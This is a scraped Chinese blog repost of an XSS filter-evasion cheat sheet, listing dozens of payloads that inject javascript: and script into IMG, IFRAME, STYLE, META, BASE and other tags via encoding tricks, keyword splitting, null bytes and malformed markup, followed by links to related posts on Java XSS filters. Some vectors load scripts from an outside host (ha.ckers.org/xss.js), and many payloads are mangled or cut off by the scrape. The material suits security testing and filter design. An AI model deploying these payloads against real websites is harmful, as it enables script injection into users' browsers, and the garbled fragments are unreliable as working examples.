java 过滤scrpict标签,XSS之规避过滤小记

最新推荐文章于 2023-08-10 10:39:38 发布
转载 最新推荐文章于 2023-08-10 10:39:38 发布 · 546 阅读 · 0
标签
#java 过滤scrpict标签
本文详细介绍了多种检测和利用XSS(跨站脚本)漏洞的方法,包括利用废弃的PLAINTEXT标签、有限字符注入、变形的XSS利用、IMG标签中的JavaScript执行、ASCII和UTF-8编码绕过过滤、JavaScript关键字拆分等。同时列举了不同浏览器的支持情况,展示了XSS攻击的各种复杂性和多样性。

1,快速检查一个人页面是否有XSS,可以利用容易被轻视的""

标签:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>

原文:

if you're in a rush and need to quickly check a page, often

times injecting the depreciated

"" tag will be enough to

check to see if something is vulnerable to XSS by messing up the

output appreciably:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>

问题:这段话说利用PLAINTEXT标签,这个标签是显示HTML源码,如何结合以上那些语句来检测XSS。望看到,了解的人留言指导,或EMAIL:stevealeen@sina.com

2,如果可改变的输入只有很少字符,那可以利用这条语句:

'';!--"=&{()}

注入之后,查看HTML源码,查找

<XSS  来判断是否可利用

3,没有任何变形,也很容易被发现的XSS利用:

浏览器 support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

4,把XSS写入IMG标签中:

SRC="javascript:alert('XSS');">

但IE7并不支持,支持浏览器:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] (红色不支持)

或没有分号和引号:

SRC=javascript:alert('XSS')>

区分大小写:

SRC=JaVaScRiPt:alert('XSS')>

HTML转议:

SRC=javascript:alert("XSS")>

5,利用重音符,有时有代码中既需要单引号也需要双引号,可以用重音符:

%60javascript:alert(%22RSnake

'XSS'")`>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] (红色不支持)

6,畸形的IMG标签:

""">">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

7,不使用任何引号--利用fromCharCode方法

SRC=javascript:alert(String.fromCharCode(88,83,83))>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

不使用任何引号--利用UTF-8编码:

SRC=javascript:alert('XSS')>

利用长UTF-8编码:

SRC=javascript:alert('XSS')>

利用16进制编码:

SRC=javascript:alert('XSS')>

即使=~ s/.*\(\d+);.*/$1/; 被过滤了……

8,拆分关键词:

SRC="jav ascript:alert('XSS');">

利用TAB键:

SRC="jav ascript:alert('XSS');">

利用换行键(Only 09 (horizontal tab), 10 (newline) and 13 (carriage

return)):

SRC="jav ascript:alert('XSS');">

嵌入特殊字符:

SRC="jav ascript:alert('XSS');">

换行:

SRC

=

"

j

a

v

a

s

c

r

i

p

t

:

a

l

e

r

t

(

'

X

S

S

'

)

"

>

利用空字符躲过过滤:

perl -e 'print "

SRC=java\0script:alert("XSS")>";' >

out

perl -e 'print

"alert("XSS")";'

> out

如果在javascript关键字中无法插入空符,可以利用ACSIC 1-32

p><p>

9:

onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

10:在标签和参数间加/

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

11://号引发错误

<

12:Firefox and Netscape 8.1 in the Gecko rendering engine mode

可以不需要">"

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

12:特殊利用:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

13,IE机制不会像firfox一样,在源码解析时添加内容,但它依然可以IMG标签里放javascript执行命令,

它的优势在于,不用添加反尖括号>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]

[O9.02]

14

<

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

15:不需要单引号和双引号

alert(a.source)

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

16,当输入被作为参数写入HTML时,服务端会把参数过滤……如:

a="$ENV{QUERY_STRING}";

可以通过转码:

a="\";alert('XSS');//";

";alert('XSS');//

17,利用Title标签:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG:

SRC="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]

[O9.02]

BODY:

优势,不用写javascript/Script...:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

18:OTHER:

HTML+TIME updates:

1. FSCommand() (attacker can use this when

executed from within an embedded Flash object)

IMG

Dynsrc:

DYNSRC="javascript:alert('XSS')">

LOWSRC="javascript:alert('XSS')">

SRC="javascript:alert('XSS');">

&

JavaScript includes (works in Netscape 4.x):

SIZE="&{alert('XSS')}">

LAYER (also only works in

Netscape 4.x)

STYLE

sheet:

HREF="javascript:alert('XSS'

19:

可以把去掉,如果后面直接跟HTML语句

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

20:本地htc文件

htc文件须要同一台服务器上

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

url("javascript:alert('XSS')");}

  • XSS

VBscript in an

image:

SRC='vbscript:msgbox("XSS")'>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

US-ASCII encoding

:这是所八位表示的ASCII,用七位来表示,这样的话,可以绕过很多的过滤,但不足的是,必须服务器支持,或客户端手设,已经TOMCAT/Apache支持这种码:

¼script¾alert(¢XSS¢)¼/script¾

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

META -FRESH 在刷新时不发送refer值,所以可以用来利用

CONTENT="0;url=javascript:alert('XSS');">

META using

data 同样不用javascript/Script关键词:

CONTENT="0;url=;javascript:;;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">Browser

support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

如果应用过滤检查是否http://开头

Browser

support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

利用IFRAME:

SRC="javascript:alert('XSS');">

FRAME (frames have the

same sorts of XSS problems as iframes):

SRC="javascript:alert('XSS');">

BACKGROUND="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]

[O9.02]

TD标签:

BACKGROUND="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]

[O9.02]

DIV background-image:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE="background-image:。0075。0072。006C。0028'。006a。0061。0076。0061。0073。0063。0072。0069。0070。0074。003a。0061。006c。0065。0072。0074。0028.1027。0058.1053。0053。0027。0029'。0029">Browser

support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

利用非法字符 1-32,

34, 39, 160, 8192-8.13, 12288, 65279

Browser

support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV标签中在冒号和表达式间用换行来躲过过滤

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYPLE利用不完整javascript:

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE="xss:expression_r(alert('XSS'))">

利用注释:

STYLE="xss:expression_r(alert('XSS'))">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE="xss:expression_r(alert('XSS'))">

exppression(alert("XSS"))'>

STYLE tag using

background-image:

CLASS=XSS>

Browser

support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

利用注释:

BASE标签:

HREF="javascript:alert('XSS');//">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

ACTIONSCRIPT XSS:

a="get";

b="URL("";

c="javascript:";

d="alert('XSS');")";

eval_r(a+b+c+d);

implementation="http://ha.ckers.org/xss.htc">

XSS

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

ID=I>

SRC="javas]]>]]>

DATASRC=#I DATAFLD=C

DATAFORMATAS=HTML>

ID="xss"><IMG

SRC="javascript:alert('XSS')">

DATAFORMATAS="HTML">

ns="urn:schemas-microsoft-com:time">

implementation="#default#time2">

to="XSS<SCRIPT

DEFER>alert("XSS")</SCRIPT>">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

如果过滤.js:

PHP:

echo('

echo('IPT>alert("XSS")');

?>

修改利用COOKIE:

Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

允许"

但不允许"

regex filter

"/

Another XSS to evade the same filter,

"/

filter,

"/

"/

using grave accents (again, doesn't work in Firefox):

PT

SRC="http://ha.ckers.org/xss.js">

DWORD:

HEX:

Octal

Mixed

XSS

Protocol resolution bypass

HREF="//www.google.com/">XSS

多一个.

javascript link

HREF="javascript:document.location='http://www.google.com/'">XSS

Java过滤XSS脚本攻击记录一下
qq_41665452的博客
05-11 2706
背景 之前公司信息安全部门对公司项目进行网络安全升级时,发现项目里可能会出现XSS脚本攻击漏洞,所以就需要对其参数进行过滤拦截。 XSS 百度百科:XSS攻击全称:cross site scripting(这里是为了和CSS区分,所以叫XSS),跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。攻击者可以使用户在浏览器中执行其预定义的恶意脚本
Java Filter过滤xss注入非法参数的方法
热门推荐
Fangel技术博客
05-12 1万+
web.xml: XSSFiler com.paic.mall.web.filter.XssSecurityFilter XSSFiler *.jsp XSSFiler *.do XSSF
XSS跨站脚本小结
06-16 1365
XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如&lt;a&gt;&lt;img&gt;等。 参考链接:http://www.jb51.net/tools/xss.htm  http://d3adend.org/xss/ghettoBypass   ';alert(String.fromCharCode(88,83,83))// \';alert(...
2022-07-25
妖仙的博客
07-27 1156
XSS的原理和分类 XSS漏洞分类 XSS漏洞查找方法
java 过滤style_Java过滤掉字符串中的html标签、style标签、script标签
weixin_31560425的博客
03-07 669
使用正则表达式import java.util.regex.Matcher;import java.util.regex.Pattern;public class HTMLSpirit{public static String delHTMLTag(String htmlStr){String regEx_script="]*?>[\\s\\S]*?"; //定义script的正则表达式Strin...
xssJava编写filter实现防止XSS攻击
qq_37634156的博客
04-08 5901
前言 名词解释 XSS攻击全称跨站脚本攻击(Cross Site Scripting),为了与重叠样式表CSS区分,换了另一个缩写XSSXSS攻击的核心是将可执行的前端脚本代码(一般为JavaScript)植入到网页中,听起来比较拗口,用大白话说就是攻击者想让你的浏览器执行他写的JS代码。 一般XSS分为两种: 反射型 实现方式: 1、攻击者将JS代码作为请求参数放置URL中,诱导用户点击,比如: http://localhost:8080/test?name=<script
xss filter java_XssFilter漏洞解决方案
weixin_35555014的博客
02-22 668
packagecom.itcast.front.save;importjavax.servlet.http.HttpServletRequest;importjavax.servlet.http.HttpServletRequestWrapper;/***XSS请求抓取*@authoryangtong*XssHttpServletRequestWrapper一个是request包装...
JAVA代码审计XSS及Filter动态代理过滤
dzqxwzoe的博客
08-10 1969
最近写了个小玩意儿,主要功能为用户信息管理,例如新增 删除 添加等。但在没写过滤之前,全是xss所以拿出来给大家进行简单分析,后续通过动态代理进行过滤
xss攻击字符过滤Java_使用Filter过滤器解决XSS跨脚本攻击和SQL注入问题
weixin_28839601的博客
02-24 1233
JAVA开发工程中难免会出现XSS和SQL注入漏洞,这些问题的产生都是由于url中带有js、html、特殊字符欺骗服务器达到请求数据。解决的思路是把传到后端的参数进行转义处理,从而避免这些问题的产生。第一步:自定义filter过滤.public class XSSFilter extends OncePerRequestFilter {private String exclude = null...
Java实现XSS防御
清水的专栏
08-26 918
XSS概述 跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆, 故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web 用户将代码植入到提供给其它用户使用的页面中。 xss攻击就是jq或h
java过滤过滤xss_web项目脚本过滤--XSS过滤
weixin_36239323的博客
02-24 1229
XSS脚本过滤脚本攻击经常是项目测试人员或者“不法分子”闲着没事干,想办法让你的程序不正常,最近项目中刚好用到所以就贴出来做个笔记。1.思路我们可以通过servlet规范中的过滤器,对每一次请求进行过滤 --> 将请求参数获取到对脚本数据进行转义处理后再进行持久化操作,比如< script > < /script>中的''号。2.配置过滤器在项目中web.xml中添加...
使用Java匹配过滤<script>标签,不区分大小写
面向对象
07-08 770
为了过滤一些内容当中包含有JS代码,因此加了对字符的过滤设置。刚开始并没有想到会有大小写的问题。 如果用户直接输入&lt;script&gt;JS代码&lt;/script&gt;这样是可以进行过滤,但没考虑到如果用户输入的是大写标签或即有大写也有小小写的标签。 最开始想到一种比较笨的方法就是一一列举,然后一一匹配。着实太笨!   翻看API,发现原来JAVA已自带有这方面的方法。汗颜!!...
java正则,过滤掉HTML标签,但保留指定的标签如table,tr,td
ah_quwei
09-15 1213
java 正则表达式
[Java]去除html中的标签或者元素属性(正则表达式/jsoup)
WWF_HelloWorld
11-20 6211
1. 使用正则表达式去除html中的标签 业务场景: 如一篇使用富文本编辑器编辑的新闻稿,需要在列表页面截取前200字作为摘要,此时需要去除html标签,截取真正的文本部分。 代码实现: /** * 删除Html标签 */ public static String removeHtmlTag(String htmlStr) { //定义script的正则表达式{或&amp;lt;scrip...
java 防止 XSS 攻击的常用方法
adobe1992
09-22 1万+
1. 自己写 filter 拦截来实现,但要注意的时,在WEB.XML 中配置 filter 的时候,请将这个 filter 放在第一位. 2. 采用开源的实现 ESAPI library ,参考网址: https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API 3. 可以采用spring 里面提供的工具类来
Java简单的XSS过滤方法
IT界迷者Blog--
10-17 1万+
Java简单的XSS过滤方法 因为某甲方程序XSS过滤类一直没起作用,所以百度了下,简单的写了个参数XSS过滤方法。。。。。上代码~~ import java.io.UnsupportedEncodingException; import java.net.URLDecoder; public class Xss { public static void main(String[] ar...
java过滤%3c p%3e标签_XSS注入方式和逃避XSS过滤的常用方法(整理)
weixin_42514288的博客
02-27 1634
(转自黑吧安全网http://www.myhack58.com/)web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式:一、html标签注入这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer)正则过滤的解决办法,php一般会使用htmlspecialchars或者htmlentities函数进行转义注入方式有/图片标签/连接标签/...
java 富文本 过滤xss_富文本XSS过滤
weixin_33575756的博客
02-24 1836
富文本内容要替换掉js代码主要防止xss,不是防止注入,防注入参数化写数据库就好了,或者将单引号替换为实体对象在做一些网站(特别是bbs之类)时,经常会有充许用户输入html样式代码,却禁止脚本的运行的需求, 以达到丰富网页样式,禁止恶意代码的运行。 当然不能用 htmlencode 和 htmldecode 方法,因为这样连基本的html代码会被禁止掉。 我在网上搜索,也没有找到好的解决办法,倒...
java过滤xss_Java对类进行XSS过滤
weixin_31869917的博客
02-12 758
Jackson对返回数据进行XSS过滤定义一个类继承ObjectMapperpackage demo;import com.fasterxml.jackson.core.JsonGenerator;import com.fasterxml.jackson.core.JsonProcessingException;import com.fasterxml.jackson.core.Version;i...
java XSS漏洞过滤
xieedeni的博客
01-30 6435
利用 Javaxssprotect(Open Source Library)对出现 xss 漏洞的参数进行过滤。 项目web.xml配置过滤器: &lt;!--增加filter--&gt; &lt;!-- 解决xss漏洞 --&gt; &lt;filter&gt; &lt;filter-name&gt;xssAndSqlFilter&lt;/filter-name&gt; &...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值